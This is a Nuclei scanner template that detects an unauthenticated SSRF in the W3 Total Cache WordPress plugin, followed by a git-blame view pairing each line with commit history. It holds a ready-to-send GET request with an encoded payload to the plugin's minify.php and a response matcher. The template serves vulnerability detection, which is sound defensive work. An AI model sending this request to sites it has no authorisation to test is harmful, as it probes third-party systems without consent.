nuclei-templates/http/vulnerabilities/wordpress/w3c-total-cache-ssrf.yaml

id: w3c-total-cache-ssrf

info:
  name: Wordpress W3C Total Cache <= 0.9.4 - Server Side Request Forgery (SSRF)
  author: random_robbie
  severity: medium
  description: |
    The W3 Total Cache WordPress plugin was affected by an Unauthenticated Server Side Request Forgery (SSRF) security vulnerability.
  reference:
    - https://wpvulndb.com/vulnerabilities/8644
    - https://klikki.fi/adv/w3_total_cache.html
  metadata:
    max-request: 1
  tags: wordpress,wp-plugin,cache,ssrf,wp

http:
  - method: GET
    path:
      - '{{BaseURL}}/wp-content/plugins/w3-total-cache/pub/minify.php?file=yygpKbDS1y9Ky9TLSy0uLi3Wyy9KB3NLKkqUM4CyxUDpxKzECr30_Pz0nNTEgsxiveT8XAA.css'

    matchers:
      - type: word
        part: body
        words:
          - "NessusFileIncludeTest"

# digest: 490a00463044022003a2982d19fdb37bad526ab3e99af98df8c75bb222a69267e24ae2a0750c0080022021ccc7dceb5c58e3adc7f902c000d313301da77b0ac69aa1a1a05ce0b8244630:922c64590222798bb761d5b6d8e72950
template update 2020-10-06 14:08:59 +00:00			`id: w3c-total-cache-ssrf`
refactor: Description field uniformization * info field reorder * reference values refactored to list * added new lines after the id and before the protocols * removed extra new lines * split really long descriptions to multiple lines (part 1) * other minor fixes 2022-04-22 10:38:41 +00:00
Create w3c-total-cache.yaml 2020-10-06 09:45:54 +00:00			`info:`
Update w3c-total-cache-ssrf.yaml 2022-08-10 09:13:01 +00:00			`name: Wordpress W3C Total Cache <= 0.9.4 - Server Side Request Forgery (SSRF)`
Updated author names 2021-06-09 12:20:56 +00:00			`author: random_robbie`
Create w3c-total-cache.yaml 2020-10-06 09:45:54 +00:00			`severity: medium`
Update w3c-total-cache-ssrf.yaml 2022-08-10 09:13:01 +00:00			`description: \|`
			`The W3 Total Cache WordPress plugin was affected by an Unauthenticated Server Side Request Forgery (SSRF) security vulnerability.`
Removed pipe (\|) character from references, because the structure requires it to be a string slice, not a string Related nuclei tickets: * #259 - dynamic key-value field support for template information * #940 - new infos in template * #834 * RES-84 2021-08-18 11:37:49 +00:00			`reference:`
Reference and description 2021-04-18 13:09:44 +00:00			`- https://wpvulndb.com/vulnerabilities/8644`
			`- https://klikki.fi/adv/w3_total_cache.html`
Added max request counter of each template 2023-04-28 08:11:21 +00:00			`metadata:`
			`max-request: 1`
templateman update 2023-10-14 11:27:55 +00:00			`tags: wordpress,wp-plugin,cache,ssrf,wp`
Create w3c-total-cache.yaml 2020-10-06 09:45:54 +00:00
Refactoring the directory structure based on protocols (#7137) * moving http templates * updated cves.json * moved network CVEs * updated scripts * updated workflows * updated requests to http * replaced network to tcp --------- Co-authored-by: sandeep <8293321+ehsandeep@users.noreply.github.com> 2023-04-27 04:28:59 +00:00			`http:`
Create w3c-total-cache.yaml 2020-10-06 09:45:54 +00:00			`- method: GET`
			`path:`
			`- '{{BaseURL}}/wp-content/plugins/w3-total-cache/pub/minify.php?file=yygpKbDS1y9Ky9TLSy0uLi3Wyy9KB3NLKkqUM4CyxUDpxKzECr30_Pz0nNTEgsxiveT8XAA.css'`
Update w3c-total-cache-ssrf.yaml 2022-08-10 09:13:01 +00:00
Create w3c-total-cache.yaml 2020-10-06 09:45:54 +00:00			`matchers:`
			`- type: word`
Update w3c-total-cache-ssrf.yaml 2022-08-10 09:13:01 +00:00			`part: body`
Create w3c-total-cache.yaml 2020-10-06 09:45:54 +00:00			`words:`
			`- "NessusFileIncludeTest"`
TemplateMan Update [Fri Oct 20 11:41:12 UTC 2023] :robot: 2023-10-20 11:41:13 +00:00
			`# digest: 490a00463044022003a2982d19fdb37bad526ab3e99af98df8c75bb222a69267e24ae2a0750c0080022021ccc7dceb5c58e3adc7f902c000d313301da77b0ac69aa1a1a05ce0b8244630:922c64590222798bb761d5b6d8e72950`